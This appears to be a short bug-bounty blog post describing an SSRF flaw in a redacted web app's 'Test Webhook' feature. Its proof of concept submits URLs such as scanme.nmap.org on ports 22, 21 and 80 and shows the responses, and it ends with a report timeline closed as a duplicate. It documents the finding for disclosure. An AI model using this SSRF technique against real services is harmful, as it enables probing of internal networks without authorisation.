Tuesday, August 13, 2019
SSRF Vulnerability in https://app.[REDACTED].com
Almost a year ago I found a simple SSRF Vulnerability in a private program which allow me to inject a SSRF payload thru their Webhook.
There is a feature called "Test Webhook" on their application and while trying some other kind of vulnerability, I was able to trigger a SSRF on this feature.
So long story short, here's the report timeline and proof of concept of this issue.
--Proof of Concept--
1. Go to https://app.<REDACTED>.com/app/webhooks
2. In the "Test Webhook" input the test payload
In my test, I tried making a request from port 22, 21 and 80 (http://scanme.nmap.org:22) and the response is
Port 22: Response: Bad response: (u'wrong number of parts', 'SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.10')
Port 21: Response: Response: Could not connect to remote server: No route to host: 101: Network is unreachable.
Port 80: Response: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<title>Go ahead and ScanMe!</title>
<link REL="SHORTCUT ICON" HREF="/shared/images/tiny-eyeicon.png" TYPE="image/png">
<META NAME="ROBOTS" CONTENT="NOARCHIVE">
<link rel="stylesheet" href="/shared/css/insecdb.css" type="text/css">
Report Title: SSRF in https://app.<REDACTED>.com/app/webhooks
Reported: 24 Oct 2018 22:21:32 UTC
Closed: 29 Oct 2018 20:07:02 UTC (Duplicate)
So I hope you enjoy this write up and have a great day everyone!